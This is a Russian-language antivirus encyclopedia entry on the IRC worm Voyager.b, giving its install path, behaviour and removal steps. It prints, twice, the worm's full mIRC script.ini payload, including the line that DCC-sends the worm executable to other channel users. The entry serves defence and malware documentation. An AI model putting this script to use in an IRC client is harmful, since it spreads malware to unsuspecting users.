IRC-Worm.Win32.Voyager.b

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm.Win32.Voyager.b Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 4 096 байт.

Инсталляция

Копирует свой исполняемый файл как: 

C:\Temp\Voyager.exe

Деструктивная активность

Записывает в файл script.ini, который ищет в одной из папок: 

c:\mirc
c:\mirc32

следующий текст: 

[SCRIPT]
n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill] at your service!
n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!
n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send $nick c:\temp\voyager.exe }

Данный скрипт расссылает исполняемый файл червя по сервису DCC всем присоединяющимся к каналу клиентам. Так же отправляет присоединившимся клиентам следующий текст: 

VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill] at your service!
The way of the bee!

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи ("Диспетчера задач") завершить процесс червя.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить файл:
    4. C:\Temp\Voyager.exe
  4. Удалить текст из файла script.ini:
    5. [SCRIPT]
n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill] at your service!
n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!
n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send $nick c:\temp\voyager.exe }
Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.Win32.Voyager.b»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.